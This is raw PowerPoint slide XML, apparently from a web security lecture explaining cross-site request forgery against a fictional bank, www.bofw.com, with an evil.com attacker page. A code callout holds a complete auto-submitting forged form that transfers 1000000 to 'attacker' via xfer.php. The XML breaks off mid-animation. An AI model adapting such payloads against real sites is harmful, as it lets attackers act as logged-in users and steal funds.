            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1685925" y="1100138"/>
            <a:ext cx="10506075" cy="609600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Assume that the victim is logged-in to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.bofw.com</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0473" y="4839141"/>
            <a:ext cx="1005227" cy="1005227"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3258952" y="5926895"/>
            <a:ext cx="2568267" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Origin: www.bofw.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>session=3#4fH8d%dA1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Group 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7509639" y="4643941"/>
            <a:ext cx="1377448" cy="1507199"/>
            <a:chOff x="7769737" y="2349795"/>
            <a:chExt cx="1377448" cy="1507199"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="TextBox 13"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7769737" y="3456884"/>
              <a:ext cx="1056507" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>evil.com</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1268" y="2549659"/>
              <a:ext cx="893446" cy="89344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5303" y="2349795"/>
              <a:ext cx="641882" cy="641882"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:gr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005" y="4719161"/>
            <a:ext cx="1245186" cy="1245186"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="917555" y="1889368"/>
            <a:ext cx="2476716" cy="1746002"/>
            <a:chOff x="8632045" y="2688229"/>
            <a:chExt cx="2476716" cy="1746002"/>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550" y="3094062"/>
              <a:ext cx="893446" cy="893446"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="TextBox 16"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8632045" y="4034121"/>
              <a:ext cx="1210460" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>bofw.com</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="TextBox 23"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9007906" y="2688229"/>
              <a:ext cx="2100855" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Bank of Washington</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </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63190">
              <a:off x="9838137" y="3059225"/>
              <a:ext cx="440390" cy="236506"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangular Callout 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6825743" y="1963338"/>
            <a:ext cx="5124517" cy="2360666"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -27499"/>
              <a:gd name="adj2" fmla="val 65794"/>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lvl="0" defTabSz="420623">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r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A09F25"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>action=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>"https://bofw.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>xfer.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3E3E3E"/>
              </a:solidFill>
              <a:latin typeface="Menlo"/>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" defTabSz="420623">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r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A09F25"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>type=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>"hidden"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A09F25"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>"to“</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3E3E3E"/>
              </a:solidFill>
              <a:latin typeface="Menlo"/>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" defTabSz="420623">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r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A09F25"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>value=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>"attacker"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3E3E3E"/>
              </a:solidFill>
              <a:latin typeface="Menlo"/>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" defTabSz="420623">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r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A09F25"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>type=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>"hidden"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A09F25"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>"amount“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" defTabSz="420623">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r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A09F25"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>value=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>"1000000"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3E3E3E"/>
              </a:solidFill>
              <a:latin typeface="Menlo"/>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" defTabSz="420623">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r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;/form&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3E3E3E"/>
              </a:solidFill>
              <a:latin typeface="Menlo"/>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" defTabSz="420623">
              <a:tabLst>
                <a:tab pos="317500" algn="l"/>
                <a:tab pos="647700" algn="l"/>
                <a:tab pos="977900" algn="l"/>
                <a:tab pos="1308100" algn="l"/>
                <a:tab pos="1625600" algn="l"/>
                <a:tab pos="1955800" algn="l"/>
                <a:tab pos="2286000" algn="l"/>
                <a:tab pos="2616200" algn="l"/>
                <a:tab pos="2933700" algn="l"/>
                <a:tab pos="3263900" algn="l"/>
                <a:tab pos="3594100" algn="l"/>
                <a:tab pos="3924300" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>.forms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>].submit();</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="35A327"/>
              </a:solidFill>
              <a:latin typeface="Menlo"/>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="53" name="Group 52"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1413191" y="4991997"/>
            <a:ext cx="2545470" cy="405544"/>
            <a:chOff x="1413191" y="4991997"/>
            <a:chExt cx="2545470" cy="405544"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="23" name="Straight Arrow Connector 22"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1413191" y="5397541"/>
              <a:ext cx="254547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10028" y="4991997"/>
              <a:ext cx="2212465" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>1) Send malicious link</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="54" name="Group 53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5105339" y="4717419"/>
            <a:ext cx="2341240" cy="396999"/>
            <a:chOff x="5105339" y="4717419"/>
            <a:chExt cx="2341240" cy="396999"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="40" name="Straight Arrow Connector 39"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5105339" y="5114417"/>
              <a:ext cx="2341240"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878252" y="4717419"/>
              <a:ext cx="795411" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>2) GET</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="55" name="Group 54"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5063700" y="5407703"/>
            <a:ext cx="2382880" cy="374818"/>
            <a:chOff x="5063700" y="5539083"/>
            <a:chExt cx="2382880" cy="374818"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="41" name="Straight Arrow Connector 40"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="5063700" y="5539083"/>
              <a:ext cx="2382880" cy="134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268824" y="5544569"/>
              <a:ext cx="2014269" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>3) HTTP/1.1 200 OK</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="51" name="Group 50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2101852" y="3120666"/>
            <a:ext cx="2265349" cy="1688143"/>
            <a:chOff x="2101852" y="3120666"/>
            <a:chExt cx="2265349" cy="1688143"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="19" name="Straight Arrow Connector 18"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="2128015" y="3120666"/>
              <a:ext cx="2239186" cy="16881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2218948">
              <a:off x="2101852" y="4014345"/>
              <a:ext cx="2201628" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>4) POST, session=3#...</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="52" name="Group 51"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2286524" y="2889202"/>
            <a:ext cx="2476934" cy="1800033"/>
            <a:chOff x="2286524" y="2889202"/>
            <a:chExt cx="2476934" cy="1800033"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="26" name="Straight Arrow Connector 25"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2286524" y="2889202"/>
              <a:ext cx="2447913" cy="18000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rot="2196168">
              <a:off x="2431729" y="3417097"/>
              <a:ext cx="2331729" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>5) HTTP/1.1 302 Found</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="184310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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
